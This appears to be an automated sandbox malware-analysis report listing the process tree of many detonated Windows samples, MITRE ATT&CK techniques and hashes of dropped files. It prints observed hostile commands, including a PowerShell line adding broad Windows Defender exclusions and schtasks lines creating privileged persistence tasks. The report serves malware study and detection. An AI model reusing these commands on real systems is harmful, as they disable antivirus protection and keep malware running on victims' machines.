      C:\Windows\System\OAlwMgU.exe
      4⤵
      PID:8252
  - - C:\Windows\System\xsKtikh.exe
      C:\Windows\System\xsKtikh.exe
      4⤵
      PID:10524
  - - C:\Windows\System\khBmyel.exe
      C:\Windows\System\khBmyel.exe
      4⤵
      PID:16784
  - - C:\Windows\System\rzfRAfw.exe
      C:\Windows\System\rzfRAfw.exe
      4⤵
      PID:17692
  - - C:\Windows\System\aOeywFj.exe
      C:\Windows\System\aOeywFj.exe
      4⤵
      PID:5460
  - - C:\Windows\System\gtqYULI.exe
      C:\Windows\System\gtqYULI.exe
      4⤵
      PID:12460
  - - C:\Windows\System\atqqXAc.exe
      C:\Windows\System\atqqXAc.exe
      4⤵
      PID:10588
  - - C:\Windows\System\YvNMZkV.exe
      C:\Windows\System\YvNMZkV.exe
      4⤵
      PID:10976
  - - C:\Windows\System\RvAxPkg.exe
      C:\Windows\System\RvAxPkg.exe
      4⤵
      PID:2316
  - - C:\Windows\System\CbfUOLO.exe
      C:\Windows\System\CbfUOLO.exe
      4⤵
      PID:9956
  - - C:\Windows\System\WVnqPnV.exe
      C:\Windows\System\WVnqPnV.exe
      4⤵
      PID:6360
  - - C:\Windows\System\iVMvkDy.exe
      C:\Windows\System\iVMvkDy.exe
      4⤵
      PID:9904
  - - C:\Windows\System\nkgjoZH.exe
      C:\Windows\System\nkgjoZH.exe
      4⤵
      PID:3172
  - - C:\Windows\System\yJMMCSo.exe
      C:\Windows\System\yJMMCSo.exe
      4⤵
      PID:12348
  - - C:\Windows\System\CrCqFnq.exe
      C:\Windows\System\CrCqFnq.exe
      4⤵
      PID:8796
  - - C:\Windows\System\jHHHxaS.exe
      C:\Windows\System\jHHHxaS.exe
      4⤵
      PID:15832
  - - C:\Windows\System\pJMPIuW.exe
      C:\Windows\System\pJMPIuW.exe
      4⤵
      PID:6316
  - - C:\Windows\System\MeKaYVb.exe
      C:\Windows\System\MeKaYVb.exe
      4⤵
      PID:10780
  - - C:\Windows\System\cilYSTN.exe
      C:\Windows\System\cilYSTN.exe
      4⤵
      PID:16280
  - - C:\Windows\System\WpskovB.exe
      C:\Windows\System\WpskovB.exe
      4⤵
      PID:5032
  - - C:\Windows\System\zgANCNL.exe
      C:\Windows\System\zgANCNL.exe
      4⤵
      PID:16116
  - - C:\Windows\System\bMODVCn.exe
      C:\Windows\System\bMODVCn.exe
      4⤵
      PID:15692
  - - C:\Windows\System\kJWNpeI.exe
      C:\Windows\System\kJWNpeI.exe
      4⤵
      PID:14224
  - - C:\Windows\System\OoZMQor.exe
      C:\Windows\System\OoZMQor.exe
      4⤵
      PID:2820
  - - C:\Windows\System\pSjoKrJ.exe
      C:\Windows\System\pSjoKrJ.exe
      4⤵
      PID:11208
  - - C:\Windows\System\UwxUTvF.exe
      C:\Windows\System\UwxUTvF.exe
      4⤵
      PID:5172
  - - C:\Windows\System\xmnQwdf.exe
      C:\Windows\System\xmnQwdf.exe
      4⤵
      PID:15660
  - - C:\Windows\System\EwhbikG.exe
      C:\Windows\System\EwhbikG.exe
      4⤵
      PID:17388
  - - C:\Windows\System\nriSLIm.exe
      C:\Windows\System\nriSLIm.exe
      4⤵
      PID:2332
  - - C:\Windows\System\ZUJSKCT.exe
      C:\Windows\System\ZUJSKCT.exe
      4⤵
      PID:7668
  - - C:\Windows\System\oJyyfRM.exe
      C:\Windows\System\oJyyfRM.exe
      4⤵
      PID:11996
  - - C:\Windows\System\ItuttTx.exe
      C:\Windows\System\ItuttTx.exe
      4⤵
      PID:8312
  - - C:\Windows\System\DBoOmZe.exe
      C:\Windows\System\DBoOmZe.exe
      4⤵
      PID:12036
  - - C:\Windows\System\vUKARQx.exe
      C:\Windows\System\vUKARQx.exe
      4⤵
      PID:10956
  - - C:\Windows\System\PmZSSNU.exe
      C:\Windows\System\PmZSSNU.exe
      4⤵
      PID:5304
  - - C:\Windows\System\PZkbVTW.exe
      C:\Windows\System\PZkbVTW.exe
      4⤵
      PID:5600
  - - C:\Windows\System\ucqOYvP.exe
      C:\Windows\System\ucqOYvP.exe
      4⤵
      PID:11428
  - - C:\Windows\System\gUgLJTk.exe
      C:\Windows\System\gUgLJTk.exe
      4⤵
      PID:7920
  - - C:\Windows\System\JsLAFLM.exe
      C:\Windows\System\JsLAFLM.exe
      4⤵
      PID:14968
  - - C:\Windows\System\OqCquEX.exe
      C:\Windows\System\OqCquEX.exe
      4⤵
      PID:16588
  - - C:\Windows\System\OgARzeH.exe
      C:\Windows\System\OgARzeH.exe
      4⤵
      PID:10736
  - - C:\Windows\System\WZbTPrj.exe
      C:\Windows\System\WZbTPrj.exe
      4⤵
      PID:6376
  - - C:\Windows\System\TIkPIxt.exe
      C:\Windows\System\TIkPIxt.exe
      4⤵
      PID:13176
  - - C:\Windows\System\LzcYzcb.exe
      C:\Windows\System\LzcYzcb.exe
      4⤵
      PID:6804
  - - C:\Windows\System\cxngobj.exe
      C:\Windows\System\cxngobj.exe
      4⤵
      PID:13984
  - - C:\Windows\System\AbMDkBS.exe
      C:\Windows\System\AbMDkBS.exe
      4⤵
      PID:7784
  - - C:\Windows\System\qtmBcHW.exe
      C:\Windows\System\qtmBcHW.exe
      4⤵
      PID:8788
  - - C:\Windows\System\TAOTZiF.exe
      C:\Windows\System\TAOTZiF.exe
      4⤵
      PID:6208
  - - C:\Windows\System\hgXELKr.exe
      C:\Windows\System\hgXELKr.exe
      4⤵
      PID:16884
  - - C:\Windows\System\TZtiWhW.exe
      C:\Windows\System\TZtiWhW.exe
      4⤵
      PID:5668
  - - C:\Windows\System\XQFgJMN.exe
      C:\Windows\System\XQFgJMN.exe
      4⤵
      PID:16972
  - - C:\Windows\System\TtelLJg.exe
      C:\Windows\System\TtelLJg.exe
      4⤵
      PID:15580
  - - C:\Windows\System\ALUnTzh.exe
      C:\Windows\System\ALUnTzh.exe
      4⤵
      PID:15960
  - - C:\Windows\System\VvZJVWo.exe
      C:\Windows\System\VvZJVWo.exe
      4⤵
      PID:16088
  - - C:\Windows\System\antQLxd.exe
      C:\Windows\System\antQLxd.exe
      4⤵
      PID:3616
  - - C:\Windows\System\XyKzUrF.exe
      C:\Windows\System\XyKzUrF.exe
      4⤵
      PID:216
  - - C:\Windows\System\meUyJTn.exe
      C:\Windows\System\meUyJTn.exe
      4⤵
      PID:9772
  - - C:\Windows\System\miydFwD.exe
      C:\Windows\System\miydFwD.exe
      4⤵
      PID:7284
  - - C:\Windows\System\fJegDeX.exe
      C:\Windows\System\fJegDeX.exe
      4⤵
      PID:16212
  - - C:\Windows\System\IKhMDBn.exe
      C:\Windows\System\IKhMDBn.exe
      4⤵
      PID:7140
  - - C:\Windows\System\kisJVRr.exe
      C:\Windows\System\kisJVRr.exe
      4⤵
      PID:18248
  - - C:\Windows\System\oyOsSth.exe
      C:\Windows\System\oyOsSth.exe
      4⤵
      PID:11600
  - - C:\Windows\System\VHWDxeU.exe
      C:\Windows\System\VHWDxeU.exe
      4⤵
      PID:9996
  - - C:\Windows\System\ooKdlpV.exe
      C:\Windows\System\ooKdlpV.exe
      4⤵
      PID:6900
  - - C:\Windows\System\FqZdEuc.exe
      C:\Windows\System\FqZdEuc.exe
      4⤵
      PID:10224
  - - C:\Windows\System\tLmybrB.exe
      C:\Windows\System\tLmybrB.exe
      4⤵
      PID:13988
  - - C:\Windows\System\oBkAYIl.exe
      C:\Windows\System\oBkAYIl.exe
      4⤵
      PID:7692
  - - C:\Windows\System\UHFRFEg.exe
      C:\Windows\System\UHFRFEg.exe
      4⤵
      PID:18180
  - - C:\Windows\System\gmREbUP.exe
      C:\Windows\System\gmREbUP.exe
      4⤵
      PID:17952
  - - C:\Windows\System\VImtmIu.exe
      C:\Windows\System\VImtmIu.exe
      4⤵
      PID:2352
  - - C:\Windows\System\vnghfDq.exe
      C:\Windows\System\vnghfDq.exe
      4⤵
      PID:10616
  - - C:\Windows\System\naigYdQ.exe
      C:\Windows\System\naigYdQ.exe
      4⤵
      PID:1544
  - - C:\Windows\System\WNsByYU.exe
      C:\Windows\System\WNsByYU.exe
      4⤵
      PID:7832
  - - C:\Windows\System\rFFwVmq.exe
      C:\Windows\System\rFFwVmq.exe
      4⤵
      PID:17744
  - - C:\Windows\System\TTYbsko.exe
      C:\Windows\System\TTYbsko.exe
      4⤵
      PID:16716
  - - C:\Windows\System\SQHMcAq.exe
      C:\Windows\System\SQHMcAq.exe
      4⤵
      PID:17392
  - - C:\Windows\System\ltqivRG.exe
      C:\Windows\System\ltqivRG.exe
      4⤵
      PID:12220
  - - C:\Windows\System\oPOGZqI.exe
      C:\Windows\System\oPOGZqI.exe
      4⤵
      PID:7956
  - - C:\Windows\System\NEOENFJ.exe
      C:\Windows\System\NEOENFJ.exe
      4⤵
      PID:16064
  - - C:\Windows\System\CJPaZqw.exe
      C:\Windows\System\CJPaZqw.exe
      4⤵
      PID:16340
  - - C:\Windows\System\IaZLSBx.exe
      C:\Windows\System\IaZLSBx.exe
      4⤵
      PID:15120
  - - C:\Windows\System\BAIpdoz.exe
      C:\Windows\System\BAIpdoz.exe
      4⤵
      PID:14164
  - - C:\Windows\System\YaPVPOg.exe
      C:\Windows\System\YaPVPOg.exe
      4⤵
      PID:17696
  - - C:\Windows\System\KHSOSCD.exe
      C:\Windows\System\KHSOSCD.exe
      4⤵
      PID:14256
  - - C:\Windows\System\BbHhDyG.exe
      C:\Windows\System\BbHhDyG.exe
      4⤵
      PID:10948
  - - C:\Windows\System\xASsWUy.exe
      C:\Windows\System\xASsWUy.exe
      4⤵
      PID:17784
  - - C:\Windows\System\JcMpEjF.exe
      C:\Windows\System\JcMpEjF.exe
      4⤵
      PID:5336
  - - C:\Windows\System\AOzbLED.exe
      C:\Windows\System\AOzbLED.exe
      4⤵
      PID:10664
  - - C:\Windows\System\pnvSzKu.exe
      C:\Windows\System\pnvSzKu.exe
      4⤵
      PID:5684
  - - C:\Windows\System\sWewUTP.exe
      C:\Windows\System\sWewUTP.exe
      4⤵
      PID:9160
  - - C:\Windows\System\npSloOB.exe
      C:\Windows\System\npSloOB.exe
      4⤵
      PID:16880
  - - C:\Windows\System\SViFsLD.exe
      C:\Windows\System\SViFsLD.exe
      4⤵
      PID:11612
  - - C:\Windows\System\HeARJDD.exe
      C:\Windows\System\HeARJDD.exe
      4⤵
      PID:2500
  - - C:\Windows\System\lIBpiYg.exe
      C:\Windows\System\lIBpiYg.exe
      4⤵
      PID:1252
  - - C:\Windows\System\TULzKTD.exe
      C:\Windows\System\TULzKTD.exe
      4⤵
      PID:7916
  - - C:\Windows\System\EdTtHuG.exe
      C:\Windows\System\EdTtHuG.exe
      4⤵
      PID:8992
- - C:\Users\Admin\Downloads\241002-xxa7esscknb0f28150e375a1504bc50e0dfa3e0f8384a84d30dcfe0c3878c036f386d57cd4N.exe
    C:\Users\Admin\Downloads\241002-xxa7esscknb0f28150e375a1504bc50e0dfa3e0f8384a84d30dcfe0c3878c036f386d57cd4N.exe
    3⤵
    PID:12920
- - C:\Users\Admin\Downloads\241002-xr55lssakp4c972103dc23d902e24d047b0f99c820b46831958240083ac3d16050c4282113N.exe
    C:\Users\Admin\Downloads\241002-xr55lssakp4c972103dc23d902e24d047b0f99c820b46831958240083ac3d16050c4282113N.exe
    3⤵
    PID:12928
- - C:\Users\Admin\Downloads\241002-yaw12swhja5294c193dc0d46ac0b801196b54c12cf79bc9346f395ec6db6ecefd06a02f6aaN.exe
    C:\Users\Admin\Downloads\241002-yaw12swhja5294c193dc0d46ac0b801196b54c12cf79bc9346f395ec6db6ecefd06a02f6aaN.exe
    3⤵
    PID:12936
  - - C:\Windows\SysWOW64\Khihld32.exe
      C:\Windows\system32\Khihld32.exe
      4⤵
      PID:4776
- - C:\Users\Admin\Downloads\241002-yfn8dstbmnfb5efafad043ee390cad8384630db2cecd2b633e571b6740ecc9a1d1186b2ae6N.exe
    C:\Users\Admin\Downloads\241002-yfn8dstbmnfb5efafad043ee390cad8384630db2cecd2b633e571b6740ecc9a1d1186b2ae6N.exe
    3⤵
    PID:12948
  - - C:\Windows\SysWOW64\Ockdmmoj.exe
      C:\Windows\system32\Ockdmmoj.exe
      4⤵
      PID:14196
    - - C:\Windows\SysWOW64\Kkpnga32.exe
        
        C:\Windows\system32\Kkpnga32.exe
        5⤵
        
        PID:12532
      - C:\Windows\SysWOW64\Pcdqhecd.exe
        
        C:\Windows\system32\Pcdqhecd.exe
        6⤵
        
        PID:17344
        
        C:\Windows\SysWOW64\Mdagbl32.exe
        
        C:\Windows\system32\Mdagbl32.exe
        7⤵
        
        PID:16264
        
        C:\Windows\SysWOW64\Ifqoehhl.exe
        
        C:\Windows\system32\Ifqoehhl.exe
        8⤵
        
        PID:7512
- - C:\Users\Admin\Downloads\241002-yfjynstbmj71b4a444e71d2023ce2adfeff6a514de523025d07bb4a9957647916d14c795a0N.exe
    C:\Users\Admin\Downloads\241002-yfjynstbmj71b4a444e71d2023ce2adfeff6a514de523025d07bb4a9957647916d14c795a0N.exe
    3⤵
    PID:12956
  - - C:\Windows\SysWOW64\Klbgfc32.exe
      C:\Windows\system32\Klbgfc32.exe
      4⤵
      PID:13268
    - - C:\Windows\SysWOW64\Mohbjkgp.exe
        
        C:\Windows\system32\Mohbjkgp.exe
        5⤵
        
        PID:1052
      - C:\Windows\SysWOW64\Ljijci32.exe
        
        C:\Windows\system32\Ljijci32.exe
        6⤵
        
        PID:16728
        
        C:\Windows\SysWOW64\Jglkkiea.exe
        
        C:\Windows\system32\Jglkkiea.exe
        7⤵
        
        PID:7516
- - C:\Users\Admin\Downloads\241002-xwl8assbrnCheatEngine75.exe
    C:\Users\Admin\Downloads\241002-xwl8assbrnCheatEngine75.exe
    3⤵
    PID:12972
- - C:\Users\Admin\Downloads\241002-xqfhkavgqc0c15c57e45373ce894c138bcd5b0dc2c_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xqfhkavgqc0c15c57e45373ce894c138bcd5b0dc2c_JaffaCakes118.exe
    3⤵
    PID:12980
- - C:\Users\Admin\Downloads\241002-xmc82a1gkl48a3e55015d97bcdcd6dfba3add2886f142114edbd835a327fb9c0f32385172bN.exe
    C:\Users\Admin\Downloads\241002-xmc82a1gkl48a3e55015d97bcdcd6dfba3add2886f142114edbd835a327fb9c0f32385172bN.exe
    3⤵
    PID:12992
  - - C:\Windows\SysWOW64\Kblpcndd.exe
      C:\Windows\system32\Kblpcndd.exe
      4⤵
      PID:15280
- - C:\Users\Admin\Downloads\241002-xzbwqswcqa0ce1b175b4d678c0977d741e4d61cc724c618b396f044dfd211bb93b4e4ac981N.exe
    C:\Users\Admin\Downloads\241002-xzbwqswcqa0ce1b175b4d678c0977d741e4d61cc724c618b396f044dfd211bb93b4e4ac981N.exe
    3⤵
    PID:13004
  - - C:\Windows\SysWOW64\Kejloi32.exe
      C:\Windows\system32\Kejloi32.exe
      4⤵
      PID:7088
    - - C:\Windows\SysWOW64\Qmanljfo.exe
        
        C:\Windows\system32\Qmanljfo.exe
        5⤵
        
        PID:13700
      - C:\Windows\SysWOW64\Onjebpml.exe
        
        C:\Windows\system32\Onjebpml.exe
        6⤵
        
        PID:5324
        
        C:\Windows\SysWOW64\Jqofippg.exe
        
        C:\Windows\system32\Jqofippg.exe
        7⤵
        
        PID:4628
- - C:\Users\Admin\Downloads\241002-xv3hwssbprb86b7472c5e230b6e5317806b3f286a03e17bf2e0d00dbfdb811adb847546610N.exe
    C:\Users\Admin\Downloads\241002-xv3hwssbprb86b7472c5e230b6e5317806b3f286a03e17bf2e0d00dbfdb811adb847546610N.exe
    3⤵
    PID:13020
  - - C:\Windows\SysWOW64\Pfepdg32.exe
      C:\Windows\system32\Pfepdg32.exe
      4⤵
      PID:10228
    - - C:\Windows\SysWOW64\Koljgppp.exe
        
        C:\Windows\system32\Koljgppp.exe
        5⤵
        
        PID:12656
      - C:\Windows\SysWOW64\Poidhg32.exe
        
        C:\Windows\system32\Poidhg32.exe
        6⤵
        
        PID:17316
- - C:\Users\Admin\Downloads\241002-xsfaksvhqd694cc48ee04de376f4d3d33359d535edf7c41afd0041be90eaedf717bead553aN.exe
    C:\Users\Admin\Downloads\241002-xsfaksvhqd694cc48ee04de376f4d3d33359d535edf7c41afd0041be90eaedf717bead553aN.exe
    3⤵
    PID:13028
- - C:\Users\Admin\Downloads\241002-xm276avfmd349c68e61d4e35de8fcd859d7687cb8284ef1bf532707fb3ab1b09340d5007a0N.exe
    C:\Users\Admin\Downloads\241002-xm276avfmd349c68e61d4e35de8fcd859d7687cb8284ef1bf532707fb3ab1b09340d5007a0N.exe
    3⤵
    PID:13036
- - C:\Users\Admin\Downloads\241002-xw2yrascjq0c1ed46a5e955f0953065680823d7761_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xw2yrascjq0c1ed46a5e955f0953065680823d7761_JaffaCakes118.exe
    3⤵
    PID:13044
- - C:\Users\Admin\Downloads\241002-yewk3stbjm8bfaf780c4d5daf6d99136aff02d95d87a40908f9d8ae85e5d8ff9629e47d247N.exe
    C:\Users\Admin\Downloads\241002-yewk3stbjm8bfaf780c4d5daf6d99136aff02d95d87a40908f9d8ae85e5d8ff9629e47d247N.exe
    3⤵
    PID:13056
  - - \??\c:\vpvpd.exe
      c:\vpvpd.exe
      4⤵
      PID:14556
    - - \??\c:\rflfxxr.exe
        
        c:\rflfxxr.exe
        5⤵
        
        PID:12356
      - \??\c:\frlffxr.exe
        
        c:\frlffxr.exe
        6⤵
        
        PID:17224
        
        \??\c:\nbnhhh.exe
        
        c:\nbnhhh.exe
        7⤵
        
        PID:15984
        
        \??\c:\tbnhtn.exe
        
        c:\tbnhtn.exe
        8⤵
        
        PID:6008
- - C:\Users\Admin\Downloads\241002-xlt56a1frp0c10506a33ff7c3c88df713d47a6e4f2_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xlt56a1frp0c10506a33ff7c3c88df713d47a6e4f2_JaffaCakes118.exe
    3⤵
    PID:13064
  - - C:\Users\Admin\Downloads\241002-xlt56a1frp0c10506a33ff7c3c88df713d47a6e4f2_JaffaCakes118.exe
      C:\Users\Admin\Downloads\241002-xlt56a1frp0c10506a33ff7c3c88df713d47a6e4f2_JaffaCakes118.exe
      4⤵
      PID:16424
- - C:\Users\Admin\Downloads\241002-xqjvzsvgqg489c139df1b1aa08d79d5e74ec1db456373e33c7e5c2cf442649bd3b75fcb59cN.exe
    C:\Users\Admin\Downloads\241002-xqjvzsvgqg489c139df1b1aa08d79d5e74ec1db456373e33c7e5c2cf442649bd3b75fcb59cN.exe
    3⤵
    PID:13076
- - C:\Users\Admin\Downloads\241002-ydma1stanqdc407c14d3ec8a0c0dd96c92465768a1dabf42afde19facaf8fe564c8f2fb035N.exe
    C:\Users\Admin\Downloads\241002-ydma1stanqdc407c14d3ec8a0c0dd96c92465768a1dabf42afde19facaf8fe564c8f2fb035N.exe
    3⤵
    PID:13088
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:17152
- - C:\Users\Admin\Downloads\241002-xtxw1ssbjn7fe0b8e23179a90768df5d55a5429a59791a5245fe5fd6886dd6771049ff8b6dN.exe
    C:\Users\Admin\Downloads\241002-xtxw1ssbjn7fe0b8e23179a90768df5d55a5429a59791a5245fe5fd6886dd6771049ff8b6dN.exe
    3⤵
    PID:13096
- - C:\Users\Admin\Downloads\241002-x5xqdssfnjb48bdcf411447bd19d91590645444bf838fa8f7b7021470cdba51c66b4913b67N.exe
    C:\Users\Admin\Downloads\241002-x5xqdssfnjb48bdcf411447bd19d91590645444bf838fa8f7b7021470cdba51c66b4913b67N.exe
    3⤵
    PID:13108
- - C:\Users\Admin\Downloads\241002-xxm6zssclq0c1f8d299cbcd203ac083a8a0a08ea76_JaffaCakes118.exe
    C:\Users\Admin\Downloads\241002-xxm6zssclq0c1f8d299cbcd203ac083a8a0a08ea76_JaffaCakes118.exe
    3⤵
    PID:13116
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 13116 -s 420
      4⤵
      Program crash
      PID:15808
- - C:\Users\Admin\Downloads\241002-xzzb2awdkbSetup.exe
    C:\Users\Admin\Downloads\241002-xzzb2awdkbSetup.exe
    3⤵
    PID:13128
- - C:\Users\Admin\Downloads\241002-yebkxaxamg83ba0f3aa9da0dce8e3d71e8860ba1c09c6abe52e772d9f35d9e5b8d233a12a5N.exe
    C:\Users\Admin\Downloads\241002-yebkxaxamg83ba0f3aa9da0dce8e3d71e8860ba1c09c6abe52e772d9f35d9e5b8d233a12a5N.exe
    3⤵
    PID:14248
- - C:\Users\Admin\Downloads\241002-xtmq2swamf362eca052002d47dc62b01a220f8ab62f231cc2addeea0985a96e66c29314640N.exe
    C:\Users\Admin\Downloads\241002-xtmq2swamf362eca052002d47dc62b01a220f8ab62f231cc2addeea0985a96e66c29314640N.exe
    3⤵
    PID:14160
  - - C:\Windows\SysWOW64\Malefbkc.exe
      C:\Windows\system32\Malefbkc.exe
      4⤵
      PID:15956
- - C:\Users\Admin\Downloads\241002-xvh49asblpf3692d9a897102e0fda227d807691d332dea1fa84a8b46055b42a266bc4ee196N.exe
    C:\Users\Admin\Downloads\241002-xvh49asblpf3692d9a897102e0fda227d807691d332dea1fa84a8b46055b42a266bc4ee196N.exe
    3⤵
    PID:4092
  - - C:\Windows\SysWOW64\Lmqiec32.exe
      C:\Windows\system32\Lmqiec32.exe
      4⤵
      PID:6100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2464 -ip 2464
1⤵
PID:6632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2788 -ip 2788
1⤵
PID:6880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1816 -ip 1816
1⤵
PID:8548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 8912 -ip 8912
1⤵
PID:8204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2788 -ip 2788
1⤵
PID:12268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 9252 -ip 9252
1⤵
PID:12172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 9300 -ip 9300
1⤵
PID:8036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3000 -ip 3000
1⤵
PID:10496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10872 -ip 10872
1⤵
PID:10488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 10444 -ip 10444
1⤵
PID:6448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6884 -ip 6884
1⤵
PID:14156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 11184 -ip 11184
1⤵
PID:6384

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
1⤵
PID:15188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 3000 -ip 3000
1⤵
PID:14960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 13116 -ip 13116
1⤵
PID:5972

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6524 -ip 6524
1⤵
PID:18328

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "241002-x9a27asgqp0c2cfaf7f746dee92a270a385e2ea48a_JaffaCakes1182" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\241002-x9a27asgqp0c2cfaf7f746dee92a270a385e2ea48a_JaffaCakes118.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:12240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "241002-x9a27asgqp0c2cfaf7f746dee92a270a385e2ea48a_JaffaCakes118" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\241002-x9a27asgqp0c2cfaf7f746dee92a270a385e2ea48a_JaffaCakes118.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "241002-x9a27asgqp0c2cfaf7f746dee92a270a385e2ea48a_JaffaCakes1182" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\241002-x9a27asgqp0c2cfaf7f746dee92a270a385e2ea48a_JaffaCakes118.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:14836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\System\symsrv.dll

Filesize
67KB

MD5
7574cf2c64f35161ab1292e2f532aabf

SHA1
14ba3fa927a06224dfe587014299e834def4644f

SHA256
de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085

SHA512
4db19f2d8d5bc1c7bbb812d3fa9c43b80fa22140b346d2760f090b73aed8a5177edb4bddc647a6ebd5a2db8565be5a1a36a602b0d759e38540d9a584ba5896ab

Download Submit
C:\Users\Admin\Admin.exe

Filesize
94KB

MD5
e84649328c8629864e9f783702b97c38

SHA1
78e3b3d4593d1316ccbb072d4d7ba9714ad90e00

SHA256
65a89447505e35cf56e2b97c38d85f69550f45b2e5418388278f560130a16620

SHA512
72a188f0fa2a7934e63117357b3066ba924fdfc243604c5ef06bf5a6e04cfb19065adff3c2a902bcc737a87d264842df7c3fb0806530c6eaca53be94968ccc30

Download Submit
C:\Users\Admin\AppData\Local\Temp\1727898595.dat

Filesize
41KB

MD5
ea30897ca70c30ba053c6bbeb29887ea

SHA1
53b73f45964c175926b57a1ba914f99876304579

SHA256
718d83d123e12748ba45710de11c5cff5ec23a56cbe1bc8449806ba4d15a5bf3

SHA512
faa6688cf07791d29523ea4772cebd8cf45980d0defb711a7cf9fc9429cdc37de152ea5c2b00a2108226037a70491bbb9d2ee32bea500ef5e05028587efb0715

Download Submit
C:\Users\Admin\AppData\Local\Temp\PBEJe.txt

Filesize
139B

MD5
173bcce4810d4901872d0ef4f0bfea4e

SHA1
561b03fdfe68b6419fddf57f32e1aab9a6126a2f

SHA256
10ea37eceabbe80fe9814280b66b957636951dbeeed18a9b4d50a1d24a6f1d1d

SHA512
2401e0a5e3f7bf590a0767449da2249d09717e8c1cb71a7475e81d9615580001cfc38705cd1a5b4edc33f7df043bf195e28e4a5442a32bc879dffc6473bd545e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI25322\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI25322\_bz2.pyd

Filesize
81KB

MD5
4101128e19134a4733028cfaafc2f3bb

SHA1
66c18b0406201c3cfbba6e239ab9ee3dbb3be07d

SHA256
5843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80

SHA512
4f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI25322\_cffi_backend.cp311-win_amd64.pyd

Filesize
174KB

MD5
739d352bd982ed3957d376a9237c9248

SHA1
961cf42f0c1bb9d29d2f1985f68250de9d83894d

SHA256
9aee90cf7980c8ff694bb3ffe06c71f87eb6a613033f73e3174a732648d39980

SHA512
585a5143519ed9b38bb53f912cea60c87f7ce8ba159a1011cf666f390c2e3cc149e0ac601b008e039a0a78eaf876d7a3f64fff612f5de04c822c6e214bc2efde

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI25322\_ctypes.pyd

Filesize
120KB

